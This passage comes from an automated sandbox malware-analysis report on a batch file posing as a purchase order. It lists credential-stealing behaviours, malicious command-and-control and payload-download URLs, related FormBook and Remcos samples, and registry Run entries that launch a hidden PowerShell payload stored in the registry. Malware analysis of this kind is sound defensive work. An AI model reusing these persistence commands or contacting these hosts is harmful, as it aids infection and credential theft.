                        signatures: Uses cmd line tools excessively to alter registry or file data
                        reg.exe
                          signatures: Creates multiple autostart registry keys
                        conhost.exe
                      wab.exe
                        signatures: Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal browser information (history, passwords, etc)
                      3 other processes
                        signatures: Tries to steal Mail credentials (via file / registry access)
                    cmd.exe
                      signatures: Uses cmd line tools excessively to alter registry or file data
                  conhost.exe
                  cmd.exe
                conhost.exe

              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://www.imvu.comr0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              http://www.imvu.com0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://login.yahoo.com/config/login0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp(0%Avira URL Cloudsafe
              https://avocaldoperu.com/0%Avira URL Cloudsafe
              https://avocaldoperu.com/Jouse1.pngamalsAffavocaldoperuone.com/Jouse1.png0%Avira URL Cloudsafe
              http://cpanel-adminhost.com/Stevns179.mix0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp/0%Avira URL Cloudsafe
              http://www.atlpicsstudios.com/pbzm/0%Avira URL Cloudsafe
              https://avocaldoperu.com/Jouse4.png0%Avira URL Cloudsafe
              http://www.katasoo.com/7qad/0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpg0%Avira URL Cloudsafe
              https://www.google.com0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              http://avocaldoperu.com0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpn.net/json.gp0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              http://www.shabygreen.top/r9e8/0%Avira URL Cloudsafe
              https://avocaldoperu.com/Jouse1.png0%Avira URL Cloudsafe
              http://www.nirsoft.net0%Avira URL Cloudsafe
              http://www.411divorce.com/hxac/0%Avira URL Cloudsafe
              http://www.martinminorgroup.com/oyqt/0%Avira URL Cloudsafe
              https://aka.ms/pscore6lBdq0%Avira URL Cloudsafe
              https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
              https://avocaldoperuone.com/Jouse4.png0%Avira URL Cloudsafe
              https://avocaldoperu.com0%Avira URL Cloudsafe
              http://cpanel-adminhost.com/wWdnBiepyw166.bin0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpX0%Avira URL Cloudsafe
              http://www.nirsoft.net/0%Avira URL Cloudsafe
              http://www.vendasnaweb1.com/jk4m/0%Avira URL Cloudsafe
              http://www.gtprivatewealth.com/4d31/0%Avira URL Cloudsafe
              http://www.openhandedvision.com/ehr0/0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              avocaldoperu.com
              104.21.62.202
              truefalse
                unknown
                ctorq.net
                3.33.130.190
                truetrue
                  unknown
                  kera333.org
                  64.46.102.70
                  truetrue
                    unknown
                    geoplugin.net
                    178.237.33.50
                    truefalse
                      unknown
                      gtprivatewealth.com
                      3.33.130.190
                      truetrue
                        unknown
                        cpanel-adminhost.com
                        193.25.216.165
                        truefalse
                          unknown
                          td-ccm-neg-87-45.wixdns.net
                          34.149.87.45
                          truetrue
                            unknown
                            vendasnaweb1.com
                            162.241.2.92
                            truetrue
                              unknown
                              www.shabygreen.top
                              203.161.41.205
                              truetrue
                                unknown
                                atlpicsstudios.com
                                3.33.130.190
                                truetrue
                                  unknown
                                  411divorce.com
                                  5.78.41.174
                                  truetrue
                                    unknown
                                    ghs.googlehosted.com
                                    142.250.186.147
                                    truefalse
                                      unknown
                                      www.katasoo.com
                                      188.114.96.3
                                      truetrue
                                        unknown
                                        iwarsut775laudrye2.duckdns.org
                                        172.111.137.132
                                        truetrue
                                          unknown
                                          www.openhandedvision.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.vendasnaweb1.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.411divorce.com
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.ctorq.net
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.atlpicsstudios.com
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    www.martinminorgroup.com
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      www.kera333.org
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        www.gtprivatewealth.com
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://cpanel-adminhost.com/Stevns179.mixfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.atlpicsstudios.com/pbzm/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.katasoo.com/7qad/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://avocaldoperu.com/Jouse4.pngfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.shabygreen.top/r9e8/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.martinminorgroup.com/oyqt/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://geoplugin.net/json.gpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.411divorce.com/hxac/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://avocaldoperu.com/Jouse1.pngfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://cpanel-adminhost.com/wWdnBiepyw166.binfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.vendasnaweb1.com/jk4m/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.openhandedvision.com/ehr0/false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.gtprivatewealth.com/4d31/true
                                                          • Avira URL Cloud: safe
                                                          unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gp( | wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.comr | wab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://avocaldoperu.com/ | wab.exe, 0000000A.00000002.4221123486.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpg | wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000002.00000002.2361305747.0000020B5DA03000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gp/ | wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://avocaldoperu.com/Jouse1.pngamalsAffavocaldoperuone.com/Jouse1.png | wab.exe, 0000000A.00000002.4243548599.0000000023800000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.imvu.com | wab.exe | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.nirsoft.net | wab.exe, 00000011.00000002.2266923406.0000000002FB4000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | wab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://avocaldoperu.com | powershell.exe, 00000002.00000002.2361305747.0000020B5E5A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com | wab.exe | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpn.net/json.gp | wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lBdq | powershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://avocaldoperu.com | powershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://avocaldoperuone.com/Jouse4.png | powershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/accounts/servicelogin | wab.exe | false | Avira URL Cloud: safe | unknown
https://login.yahoo.com/config/login | wab.exe | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpX | wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.nirsoft.net/ | wab.exe | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.ebuddy.com | wab.exe | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
5.78.41.174 | 411divorce.com | Iran (ISLAMIC Republic Of) | 16322 | PARSONLINETehran-IRANIR | true
104.21.62.202 | avocaldoperu.com | United States | 13335 | CLOUDFLARENETUS | false
188.114.96.3 | www.katasoo.com | European Union | 13335 | CLOUDFLARENETUS | true
203.161.41.205 | www.shabygreen.top | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
193.25.216.165 | cpanel-adminhost.com | Germany | 10753 | LVLT-10753US | false
172.111.137.132 | iwarsut775laudrye2.duckdns.org | United States | 36351 | SOFTLAYERUS | true
34.149.87.45 | td-ccm-neg-87-45.wixdns.net | United States | 2686 | ATGS-MMD-ASUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
162.241.2.92 | vendasnaweb1.com | United States | 26337 | OIS1US | true
3.33.130.190 | ctorq.net | United States | 8987 | AMAZONEXPANSIONGB | true
142.250.186.147 | ghs.googlehosted.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1500456
Start date and time: 2024-08-28 14:00:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winBAT@50/20@15/11
EGA Information:
• Successful, ratio: 62.5%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 201
• Number of non-executed functions: 270
Cookbook Comments:
• Found application associated with file extension: .bat
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5288 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7616 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7860 because it is empty
• Not all processes were analysed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded maximum capacity and may be missing behavior information.
• Report size exceeded maximum capacity and may be missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat
Time | Type | Description
08:01:10 | API Interceptor | 211x Sleep call for process: powershell.exe modified
08:02:25 | API Interceptor | 4026335x Sleep call for process: wab.exe modified
08:03:30 | API Interceptor | 1361472x Sleep call for process: relog.exe modified
13:01:48 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Almindeligheden %outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)
13:01:56 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Almindeligheden %outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)
13:02:35 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Bilateralities %Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)
13:02:44 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Bilateralities %Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
5.78.41.174 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtf | malicious | FormBook | www.411divorce.com/hxac/
5.78.41.174 | docs_pdf.exe | malicious | FormBook | www.411divorce.com/6rlx/?D0Pts04=Q2ZAF+B5MPpYnKblwTws72s1FRS0QoBZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53W3Ctkqsy7izJexcMbesSkfCBVyo5K3pGetYj3FpCs5hqCFg/EaJo=&Q8s=tdcd5h7ptjmdxx
5.78.41.174 | SHIPPING DOCS_pdf.exe | malicious | FormBook | www.411divorce.com/6rlx/?mv0D=Q2ZAF+B5MPpYnKbk8zx56B5rL1aOA7pZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53WlSV2qsC0iw14ssBnKMCkfzBn744B3pSPmJk=&Jj=kpS8
5.78.41.174 | purchase order_pdf.exe | malicious | FormBook | www.411divorce.com/6rlx/?MdEl=Q2ZAF+B5MPpYnKbk8zx56B5rL1aOA7pZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53WlSV2qsC0iw14ssBnKMCkfzBn744B3pSPmJk=&cv4D=Bv0xSH88iTF48zS0
188.114.96.3 | 709876765465.exe | malicious | DBatLoader, FormBook | www.coinwab.com/kqqj/
188.114.96.3 | http://allegro-8888.com/ | malicious | Unknown | allegro-8888.com/xml/index.html
188.114.96.3 | PO_112234525626823775.js | malicious | Lokibot | werdotx.shop/Devil/PWS/fre.php
188.114.96.3 | nOyswc9ly2.dll | malicious | Unknown | web.ad87h92j.com/4/t.bmp
188.114.96.3 | pXm5oVO3Go.exe | malicious | Nitol | web.ad87h92j.com/4/t.bmp
188.114.96.3 | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/0U9QqTZ6/download
188.114.96.3 | FedEx Shipping Document.scr.exe | malicious | Azorult | l0h5.shop/CM341/index.php
188.114.96.3 | Quote 1T PN40 082624.exe | malicious | FormBook | www.lampgm.pro/em9t/
188.114.96.3 | weave.exe | malicious | DCRat, PureLog Stealer, zgRAT | 671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
188.114.96.3 | steam_module_x64.exe | malicious | DCRat, PureLog Stealer, zgRAT | 671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
203.161.41.205 | SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | malicious | FormBook | www.quiluxx.top/snq6/
203.161.41.205 | New PO.exe | malicious | FormBook, PureLog Stealer | www.hellenstore.top/sfd2/
203.161.41.205 | Your file name without extension goes here.exe | malicious | FormBook | www.tfcgreen.top/mcba/
203.161.41.205 | adobe_scanner12.exe | malicious | FormBook | www.shabygreen.top/4n8t/
203.161.41.205 | 7RsDGpyOQk.exe | malicious | FormBook | www.shabygreen.top/4n8t/
203.161.41.205 | AWB 112-17259653.exe | malicious | FormBook | www.devtech.life/rewk/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
td-ccm-neg-87-45.wixdns.net | https://puffham.wixsite.com/my-site-1 | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | http://philauberson.wixsite.com/my-swisscom-2 | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | http://kafen33591.wixsite.com/my-site-1 | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | https://jcfralish.wixsite.com/currently | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | https://cathymanns101.wixsite.com/my-site-1 | malicious | HTMLPhisher | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | https://igphoto6.wixsite.com/website | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | SecurePay from Chase Account8483 YYLRe Payment Reference.msg | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | https://adeptpanels-dot-yamm-track.appspot.com/2eom0MELDMAZqyDf58Qb-CaUFsI-c48Rnne-PZO1JwR-iPuRvkQHzPSswovRZymRH_kluMA6Z9jOLPPEI8OM3nIm-kmmN4wULHh9TcdnRj0ERzmv9SqeinqqRgtAJ-iMkdlIB6mujl4X-M9b7wZ65ft6ApGqOJL4diw5gOaAYwQWaCarvoV3E2VGG7Vl6X5YEvrRnuYUy4bD3rhvMpRAX_3vDSS0Uml4qjpgTfjXVYzhvRZZl3P9eDiT4iKvuKg4lxDjHAILKr1cW2MqcI_Qm7zM5LQnA-SAfAa297-DWqo6Pmg_YmPScvZfSaReawjPVY7C1ZEXSWvnoMUBG1fR1Pz-BCQ | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | https://www.adeptpanels.com/responsepoint-tech?utm_source=direct_mailer&nx_name=Tomer+Imber&nx_id=RP106334&utm_content=mail1&utm_campaign=ResponsePoint_Tech_Del_14to22_13Aug_2024&utm_medium=CTA&nx_email=tomer_i@optimove.com | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | SecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtf | malicious | FormBook | 34.149.87.45
www.shabygreen.top | adobe_scanner12.exe | malicious | FormBook | 203.161.41.205
www.shabygreen.top | 7RsDGpyOQk.exe | malicious | FormBook | 203.161.41.205
cpanel-adminhost.com | PO_GM260820242020031808174KR18260824_purchase_doc_00000(991KB).vbs | malicious | FormBook, GuLoader, Remcos | 193.25.216.165
cpanel-adminhost.com | Dhl_air_waybill_shipping_documents_original_BL_CI&PL_13_08_2024_00000000_doc.vbs | malicious | Unknown | 193.25.216.165
geoplugin.net | August Shipment - Inv No. 041.xls | malicious | Remcos | 178.237.33.50
geoplugin.net | SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | PO_304234.xls | malicious | Remcos | 178.237.33.50
geoplugin.net | RFQ No. 109078906v.xla.xlsx | malicious | Remcos | 178.237.33.50
geoplugin.net | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | another.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | rnr.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | thrylPXnvfySmGN.exe | malicious | Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://redtrain.top/offiperry?login=sarah.bourke@zendesk.com | malicious | Unknown | 104.17.25.14
 | https://zngw.officeinvoicedoc.com/DhpuI | malicious | HTMLPhisher | 104.17.25.14
 | file.exe | malicious | Unknown | 172.64.41.3
 | https://silverangelshomes.com/res444.php?4-68747470733a2f2f684a456d2e6c64656e626572616e2e636f6d2f4d33306830536a4f2f- | malicious | HTMLPhisher | 188.114.96.3
 | file.exe | malicious | Unknown | 172.64.41.3
 | Scanned copy payment.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
 | pcsx2-v2.0.2-windows.exe | malicious | LummaC | 188.114.97.3
 | qbvytVOPN0.exe | malicious | LummaC, Go Injector, LummaC Stealer | 104.21.84.50
 | https://nr-srpack-dk-payment-conformations.fushenq.com/ | malicious | HTMLPhisher | 104.17.25.14
 | CcPVItZy6w.exe | malicious | LummaC | 188.114.97.3
PARSONLINETehran-IRANIR | SecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtf | malicious | FormBook | 5.78.41.174
 | x86.elf | malicious | Mirai | 178.169.26.221
 | file.exe | malicious | Vidar | 188.245.87.202
 | FE89Nae47k.exe | malicious | Vidar | 188.245.87.202
 | 66b0ba4420669_main.exe | malicious | Vidar | 188.245.87.202
 | 66b09f01e0030_dozkey.exe | malicious | Vidar | 188.245.87.202
 | lem.exe | malicious | Vidar | 188.245.87.202
 | mek_n_bat.bat | malicious | Unknown | 188.245.88.234
 | EVnD2SuX13.elf | malicious | Mirai, Okiru | 5.78.169.169
 | docs_pdf.exe | malicious | FormBook | 5.78.41.174
VNPT-AS-VNVNPTCorpVN | IMG_00991ORDER_FILES.exe | malicious | FormBook, GuLoader | 203.161.42.73
 | http://o62arw.dsjpropertymanagementllc.com | malicious | EvilProxy, HTMLPhisher | 203.161.38.167
 | INVG0088 LHV3495264 BL327291535V.exe | malicious | FormBook | 203.161.42.73
 | #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs | malicious | FormBook, GuLoader | 203.161.46.205
 | AIDHL3290435890.exe | malicious | FormBook | 203.161.43.228
 | SALARY OF AUG 2024.exe | malicious | FormBook | 203.161.41.190
 | http://o62arw.dsjpropertymanagementllc.com | malicious | EvilProxy, HTMLPhisher | 203.161.38.167
 | PO#4510065525.exe | malicious | FormBook | 203.161.43.228
 | Quote 1T PN40 082624.exe | malicious | FormBook | 203.161.46.201
 | MAPAL AMENDED PI SO23000680.exe | malicious | FormBook | 203.161.55.124
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Scanned copy payment.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.62.202
 | Request for Quotation No. KTC 56376.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.62.202
 | Revised PI 28 08 2024.exe | malicious | AgentTesla | 104.21.62.202
 | GCBrnEGE22coKRz.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.62.202
 | https://aka.ms/LearnAboutSenderIdentification | malicious | HTMLPhisher | 104.21.62.202
 | Scan000406860.exe | malicious | Snake Keylogger | 104.21.62.202
 | update.exe | malicious | Metasploit | 104.21.62.202
 | Port Agency Appointment - VELOS ONYX.pdf.scr.exe | malicious | AgentTesla | 104.21.62.202
 | UNITY SAKURA - VESSEL'S_PARTICULARS.pdf.scr.exe | malicious | AgentTesla | 104.21.62.202
 | BGC-2024-EST-001 & BGC-2024-DST-003.xlsx.scr.exe | malicious | AgentTesla | 104.21.62.202
37f463bf4616ecd445d4a1937da06e19 | IMS64.dll.dll | malicious | BruteRatel | 104.21.62.202
 | IMS64.dll.dll | malicious | BruteRatel | 104.21.62.202
 | Payment_Advice.exe | malicious | FormBook, GuLoader | 104.21.62.202
 | Apponde2.exe | malicious | AveMaria, UACMe, XRed | 104.21.62.202
 | file.exe | malicious | Meduza Stealer | 104.21.62.202
 | file.exe | malicious | LummaC, Vidar | 104.21.62.202
 | file.exe | malicious | LummaC, Vidar | 104.21.62.202
 | x64_x32_installer__v4.4.9.msi | malicious | Unknown | 104.21.62.202
 | file.exe | malicious | LummaC, Vidar | 104.21.62.202
 | Setup.exe | malicious | Vidar | 104.21.62.202
                                                          No context
                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):962
                                                          Entropy (8bit):5.013811273052389
                                                          Encrypted:false
                                                          SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                          MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                          SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                          SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                          SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                          Malicious:false
                                                          Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):11608
                                                          Entropy (8bit):4.8908305915084105
                                                          Encrypted:false
                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                          MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                          SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                          SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
